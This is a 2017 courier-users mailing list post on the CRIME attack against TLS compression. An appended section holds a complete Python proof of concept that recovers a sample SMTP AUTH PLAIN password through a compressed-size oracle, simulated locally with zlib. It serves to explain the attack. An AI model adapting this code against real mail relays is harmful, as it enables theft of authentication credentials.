On Thu 30/Mar/2017 12:58:26 +0200 Sam Varshavchik wrote:
> Alessandro Vesely writes:
>
>> SSL/TLS compression   Yes   INSECURE (more info)
>> [(more info)->https://community.qualys.com/blogs/securitylabs/2012/09/14/crime-information-leakage-attack-against-ssltls]
>>
>> I note the TLS_COMPRESSION option has gone away. Are there other TLS options
>> worth trying to remove compression?
>
> The only known issue with TLS compression is when it is also used by web
> servers that also implement SPDY, and its own built-in compression.
>
> You have to read https://en.wikipedia.org/wiki/CRIME very carefully.
Yeah, now I recall. In general, it seems one can discover any secret field transmitted within a secured connection if he can choose another part of the content. Let's hypothesize you have a smart host that you use with TLS and plaintext password. If any mail you allow me to relay goes through there, I could try and send out the dictionary while checking if the connection to your smart host achieves any compression... Hm... Can TLS compress across packets without pipelining?

Ale
-- 
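The compression side channel Ale sketches above, worked through as an added example (this is not code from the thread, from Courier, or from the CRIME write-ups). Everything in it is constructed: a made-up SMTP session with the relay authenticating to its smart host as alice/hunter2 and then relaying a message whose body the attacker chose, and an oracle that returns the compressed size the attacker is assumed to observe on the wire, as in Ale's scenario. The whole connection is modelled as one deflate stream because TLS keeps the compression state across records (RFC 3749), so the AUTH line and the later DATA body share one LZ77 window. Fixed Huffman tables (zlib's Z_FIXED) are assumed so that an 8-step alignment loop is provably enough to turn a few saved bits into a visible byte; real stacks use dynamic tables and the same attack needs more trials.

```python
import base64
import zlib

# Constructed sample credentials for the smart-host account (not real ones).
# AUTH PLAIN sends base64("\0" + user + "\0" + password) on one line.
PASSWORD = b"hunter2"
SECRET = base64.b64encode(b"\x00alice\x00" + PASSWORD)

B64_ALPHABET = (b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                b"abcdefghijklmnopqrstuvwxyz0123456789+/=")
TERMINATOR = b"\r"   # a correct guess of CR means the whole credential is known

# Assumption: fixed Huffman tables, so every ASCII literal costs exactly 8 bits
# and the alignment loop below is provably sufficient.  Real stacks use dynamic
# tables (Z_DEFAULT_STRATEGY); the attack still works but needs more trials.
STRATEGY = getattr(zlib, "Z_FIXED", zlib.Z_DEFAULT_STRATEGY)


def client_session(attacker_body: bytes) -> bytes:
    """Plaintext the relay sends to its smart host inside one TLS connection:
    its own AUTH PLAIN first, then the message it relays for the attacker."""
    return (b"EHLO relay.example\r\n"
            b"AUTH PLAIN " + SECRET + b"\r\n"
            b"MAIL FROM:<mallory@evil.example>\r\n"
            b"RCPT TO:<victim@example.net>\r\n"
            b"DATA\r\n" + attacker_body + b"\r\n.\r\n")


def wire_size(attacker_body: bytes) -> int:
    """What the attacker can see: the size of the compressed stream.

    One deflate stream models the whole connection because TLS keeps the
    compression state across records (RFC 3749), so the AUTH line and the
    later DATA body share the same LZ77 window.
    """
    c = zlib.compressobj(level=9, strategy=STRATEGY)
    return len(c.compress(client_session(attacker_body)) + c.flush())


def probe_body(known: bytes, guess: bytes, align: int) -> bytes:
    """Attacker-chosen message body: the known prefix plus one guessed byte.

    0x80 is a sentinel that occurs nowhere else, so a wrong guess cannot start
    a match with what follows it.  The distinct bytes 0x90.. each cost 9 bits
    as fixed-Huffman literals, so align = 0..7 walks through every bit
    alignment and a saving of a few bits becomes a whole byte for most of them.
    """
    padding = bytes(range(0x90, 0x90 + align))
    return b"AUTH PLAIN " + known + guess + b"\x80" + padding


def recover_secret(oracle, alphabet: bytes = B64_ALPHABET + TERMINATOR,
                   max_len: int = 128) -> bytes:
    """Recover the AUTH PLAIN payload byte by byte from a size oracle.

    The guess that extends the LZ77 match against the real AUTH line
    compresses smaller than every other guess; summing over the alignments
    makes that difference show up reliably.
    """
    known = b""
    for _ in range(max_len):
        scores = {}
        for i in range(len(alphabet)):
            guess = alphabet[i:i + 1]
            scores[guess] = sum(oracle(probe_body(known, guess, a))
                                for a in range(8))
        best = min(scores, key=scores.get)
        if best == TERMINATOR:
            return known
        known += best
    return known


def recovered_password(oracle=wire_size) -> bytes:
    """Decode the recovered AUTH PLAIN payload back to the password."""
    return base64.b64decode(recover_secret(oracle)).split(b"\x00")[2]


if __name__ == "__main__":
    print("recovered AUTH PLAIN payload:", recover_secret(wire_size).decode())
    print("password:", recovered_password().decode())
```

Each guessed byte costs the attacker one relayed message per alignment, so the base64 payload here falls in a few hundred messages; the oracle only works as long as the AUTH line is still inside the compressor's 32 KB window when the attacker's body goes through, and only if the attacker can observe the record sizes on the wire.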
_______________________________________________ courier-users mailing list courier-users@lists.sourceforge.net Unsubscribe: https://lists.sourceforge.net/lists/listinfo/courier-users